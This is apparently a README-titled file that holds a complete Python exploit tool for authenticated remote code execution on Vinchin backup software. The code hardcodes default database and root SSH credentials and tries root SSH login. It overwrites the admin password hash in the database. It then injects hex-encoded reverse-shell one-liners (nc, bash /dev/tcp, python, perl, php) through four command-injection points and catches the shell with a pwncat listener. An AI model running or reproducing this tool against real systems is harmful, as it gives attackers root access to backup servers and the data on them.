# README.md
# Rendering markdown...
import re
import sys
import time
import json
import random
import string
import socket
import hashlib
import requests
import binascii
import argparse
import threading
import pwncat.manager
import mysql.connector
from packaging import version
from selenium import webdriver
from rich.console import Console
from urllib.parse import urlparse
from fake_useragent import UserAgent
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support import expected_conditions as EC
from requests.packages.urllib3.exceptions import InsecureRequestWarning
class VinchinRCE:
def __init__(
self,
url: str,
payload: str,
username: str,
password: str,
rshell_ip: str,
rshell_port: str,
payload_type: str,
):
self.url = url
self.username = username
self.password = password
self.old_password = None
self.rshell_ip = rshell_ip
self.rshell_port = rshell_port
self.payload_type = payload_type
self.revshell_connected = False
self.user_agent = UserAgent().random
self.db_user = "vinchin"
self.db_password = "yunqi123456"
self.db_name = "vinchin_db"
self.root_user = "root"
self.root_password = "Backup@3R"
self.console = Console()
self.driver = self.setup_driver()
self.payloads = {
"nc": f"nc -e /bin/bash {self.rshell_ip} {self.rshell_port}",
"bash": f"bash -i >& /dev/tcp/{self.rshell_ip}/{self.rshell_port} 0>&1",
"python": (
f"python -c 'import os,pty,socket;"
f's=socket.socket();s.connect(("{self.rshell_ip}",{self.rshell_port}));'
f"[os.dup2(s.fileno(),f) for f in (0, 1, 2)];"
f'pty.spawn("bash")\''
),
"perl": (
f'perl -e \'use Socket;$i="{self.rshell_ip}";$p={self.rshell_port};'
f'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
f"if(connect(S,sockaddr_in($p,inet_aton($i)))){{"
f'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
f'exec("bash -i");}};\''
),
"php": (
f'php -r \'$sock=fsockopen("{self.rshell_ip}",{self.rshell_port});'
f'$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\''
),
}
self.payload = self.construct_command(self.payloads[payload])
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@staticmethod
def construct_command(payload: str) -> str:
hex_encoded_payload = binascii.hexlify(payload.encode()).decode()
formatted_payload = "".join(
[
"\\x" + hex_encoded_payload[i : i + 2]
for i in range(0, len(hex_encoded_payload), 2)
]
)
command = f";echo -e {formatted_payload}|bash;"
return command
def check_vinchin_version(self, page_html: str) -> None:
if page_html is None:
self.custom_print("Failed to connect to the target.", "-")
sys.exit(1)
version_pattern = r"Vinchin build: (\d+\.\d+\.\d+\.\d+)"
version_match = re.search(version_pattern, page_html)
if not version_match:
self.custom_print("Unable to extract version.", "-")
sys.exit(1)
detected_version = version.parse(version_match.group(1))
self.custom_print(f"Detected Vinchin version: {detected_version}", "*")
vulnerable_versions = [
(version.parse("5.0.0"), version.parse("5.1.0")),
(version.parse("6.0.0"), version.parse("6.1.0")),
(version.parse("6.7.0"), version.parse("6.8.0")),
(version.parse("7.0.0"), version.parse("7.3.0")),
]
for low, high in vulnerable_versions:
if low <= detected_version < high:
self.custom_print(
f"Vinchin version {detected_version} is vulnerable.", "+"
)
return
self.custom_print(f"Vinchin version {detected_version} is not vulnerable.", "-")
sys.exit(1)
def manage_db_password(self, action) -> None:
parsed_url = urlparse(self.url)
self.db_host = parsed_url.hostname
connection = None
cursor = None
original_hash = None
try:
connection = mysql.connector.connect(
host=self.db_host,
user=self.db_user,
password=self.db_password,
database=self.db_name,
connection_timeout=5,
)
cursor = connection.cursor()
match action:
case "change":
new_password = "".join(
random.choices(string.ascii_letters + string.digits, k=10)
)
new_hash = hashlib.md5(new_password.encode()).hexdigest()
cursor.execute(
"SELECT password FROM bd_user WHERE user_name = %s",
(self.username,),
)
result = cursor.fetchone()
original_hash = result[0] if result else None
cursor.execute(
"UPDATE bd_user SET password = %s WHERE user_name = %s",
(new_hash, self.username),
)
self.password = new_password
self.old_password = original_hash
self.custom_print(
f"Password for user '{self.username}' changed to {new_password}.",
"+",
)
connection.commit()
self.login()
case "restore":
cursor.execute(
"UPDATE bd_user SET password = %s WHERE user_name = %s",
(self.old_password, self.username),
)
self.password = self.old_password
self.custom_print(
f"Restored the original password for user '{self.username}'.",
"+",
)
connection.commit()
case _:
self.custom_print(f"Unknown action: {action}", "-")
except mysql.connector.Error as error:
self.custom_print(f"Failed to {action} the password: {error}", "-")
if action == "change" and original_hash:
self.password = original_hash
else:
self.custom_print(
f"Attempting to log in with the original credentials: user={self.username}, password={self.password}",
"!",
)
self.login()
finally:
if cursor:
cursor.close()
if connection and connection.is_connected():
connection.close()
def setup_driver(self) -> webdriver.Chrome:
self.custom_print("Initializing WebDriver...", "*")
self.custom_print("Configuring Chrome options...", "*")
options = Options()
options.add_argument("--ignore-certificate-errors")
options.add_argument("--headless")
options.add_argument(f"user-agent={self.user_agent}")
self.custom_print("Setting up WebDriver service...", "*")
service = Service(ChromeDriverManager().install())
self.custom_print("Launching Chrome browser...", "*")
driver = webdriver.Chrome(service=service, options=options)
driver.set_window_size(1366, 768)
return driver
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}"
)
def start_listener(self, timeout=30) -> None:
with socket.create_server((self.rshell_ip, int(self.rshell_port))) as listener:
listener.settimeout(timeout)
self.custom_print(
f"Waiting for incoming connection on port {self.rshell_port}...", "*"
)
try:
victim, victim_addr = listener.accept()
self.revshell_connected = True
self.custom_print(
f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
)
with pwncat.manager.Manager() as manager:
manager.create_session(
platform="linux", protocol="socket", client=victim
)
self.custom_print("Dropping to pwncat prompt...", "+")
manager.interactive()
except socket.timeout:
self.custom_print(
f"No reverse shell connection received within {timeout} seconds.",
"-",
)
def root_ssh(self) -> None:
self.custom_print("Attempting SSH connection...", "*")
try:
parsed_url = urlparse(self.url)
ssh_target = parsed_url.hostname
with pwncat.manager.Manager() as manager:
manager.create_session(
platform="linux",
protocol="ssh",
host=ssh_target,
user=self.root_user,
password=self.root_password,
timeout=5,
)
self.custom_print(
"SSH connection successful, entering interactive mode.", "+"
)
manager.interactive()
return True
except Exception as e:
self.custom_print(f"SSH connection failed: {e}", "-")
return False
def login(self) -> None:
try:
self.driver.get(self.url)
page_html = self.driver.page_source
self.check_vinchin_version(page_html)
self.custom_print("Waiting for the username input field...", "*")
username_input = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.NAME, "username"))
)
self.custom_print("Waiting for the password input field...", "*")
password_input = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.NAME, "password"))
)
self.custom_print("Waiting for the submit button...", "*")
submit_button = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.ID, "login-btn"))
)
self.custom_print("Sending username and password...", "*")
username_input.send_keys(self.username)
password_input.send_keys(self.password)
self.custom_print("Submitting the form...", "*")
submit_button.click()
time.sleep(2)
error_alert = self.driver.find_element(By.CLASS_NAME, "my_alert")
if "display: block;" in error_alert.get_attribute("style"):
self.custom_print(
"Login failed due to an error alert on the page.", "-"
)
sys.exit(1)
except NoSuchElementException:
self.custom_print("Logged In!", "+")
self.manage_db_password("restore") if self.old_password else None
self.custom_print(f"Using {self.payload_type} exploitation method !", "+")
match self.payload_type:
case "setNetworkCardInfo":
self.setNetworkCardInfo()
case "syncNtpTime":
self.syncNtpTime()
case "deleteUpdateAPK":
self.deleteUpdateAPK()
case "getVerifydiyResult":
self.getVerifydiyResult()
except Exception as e:
self.custom_print(f"An error occurred during login: {e}", "-")
self.manage_db_password("restore") if self.old_password else None
sys.exit(1)
def send_http_request(self, function_name: str, params: dict, module: str) -> None:
cookies = self.driver.get_cookies()
session = requests.Session()
cookie_dict = {cookie["name"]: cookie["value"] for cookie in cookies}
data = {"m": module, "f": function_name, "p": json.dumps(params)}
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": self.user_agent,
"Origin": self.url,
}
try:
session.post(
f"{self.url}/api/",
headers=headers,
cookies=cookie_dict,
data=data,
verify=False,
timeout=5,
)
except requests.exceptions.Timeout:
pass
except requests.exceptions.RequestException as e:
self.custom_print(f"An error occurred: {e}", "-")
def setNetworkCardInfo(self) -> None:
self.custom_print("Navigating to system management...", "*")
system_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.NAME, "sysmanagement"))
)
system_link.click()
self.custom_print("Navigating to setting manager...", "*")
setting_manager_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.NAME, "setting_manager"))
)
setting_manager_link.click()
self.custom_print("Navigating to network settings...", "*")
network_settings_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//a[contains(@href, 'system_network.php')]")
)
)
network_settings_link.click()
self.custom_print(
f"Injecting payload for reverse shell: {self.rshell_ip}:{self.rshell_port}...",
"*",
)
networkcard_option = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located(
(By.XPATH, "//select[@name='networkcard']/option")
)
)
self.driver.execute_script(
"arguments[0].innerText = arguments[1]", networkcard_option, self.payload
)
self.custom_print("Submitting the network settings form...", "*")
ok_button = WebDriverWait(self.driver, 15).until(
EC.element_to_be_clickable((By.ID, "ipsubmit"))
)
ok_button.click()
self.custom_print("Check your listener h4x0rm4n...", "+")
def syncNtpTime(self) -> None:
params = {"ntphost": f"time.nist.gov {self.payload}"}
self.send_http_request("syncNtpTime", params, "8")
def deleteUpdateAPK(self) -> None:
params = {"md5": "h4x0rm4n", "file_name": self.payload}
self.send_http_request("deleteUpdateAPK", params, "8")
def getVerifydiyResult(self) -> None:
params = {"type": "1", "value": f"127.0.0.1 {self.payload}"}
self.send_http_request("getVerifydiyResult", params, "14")
def main() -> None:
    """Parse the command line, run the tool and always shut the browser down.

    An SSH session with the built-in root credentials is tried first. Only if
    that fails is a listener thread started and the password-change / login
    flow run. The Chrome WebDriver created by ``VinchinRCE`` is quit on every
    exit path, including ``sys.exit()`` raised during the flow.
    """
    parser = argparse.ArgumentParser(description="Authenticated RCE on VinChin 7.2.")
    parser.add_argument(
        "-u",
        "--url",
        default="https://192.168.1.7",
        help="URL of the login page",
    )
    parser.add_argument(
        "-user", "--username", default="admin", help="Username for login"
    )
    parser.add_argument(
        "-p", "--password", default="123456", help="Password for login"
    )
    parser.add_argument(
        "-rip", "--rshell_ip", default="192.168.1.5", help="Reverse shell IP address"
    )
    parser.add_argument(
        "-rport", "--rshell_port", default="1338", help="Reverse shell port"
    )
    parser.add_argument(
        "--payload_type",
        default="syncNtpTime",
        choices=[
            "setNetworkCardInfo",
            "syncNtpTime",
            "deleteUpdateAPK",
            "getVerifydiyResult",
        ],
        help="Type of payload to send",
    )
    parser.add_argument(
        "--payload",
        choices=["nc", "bash", "python", "perl", "php"],
        default="nc",
        help="Type of payload to use (choices: 'nc', 'bash', 'python', 'perl', 'php'), default='nc'",
    )
    args = parser.parse_args()
    vinchin_rce = VinchinRCE(
        args.url,
        args.payload,
        args.username,
        args.password,
        args.rshell_ip,
        args.rshell_port,
        args.payload_type,
    )
    try:
        if not vinchin_rce.root_ssh():
            # Daemon thread: it must not keep the process alive if the main
            # flow exits early.
            listener_thread = threading.Thread(
                target=vinchin_rce.start_listener, daemon=True
            )
            listener_thread.start()
            vinchin_rce.manage_db_password("change")
            listener_thread.join()
    finally:
        # The headless Chrome process outlives the script unless quit explicitly.
        vinchin_rce.driver.quit()


if __name__ == "__main__":
    main()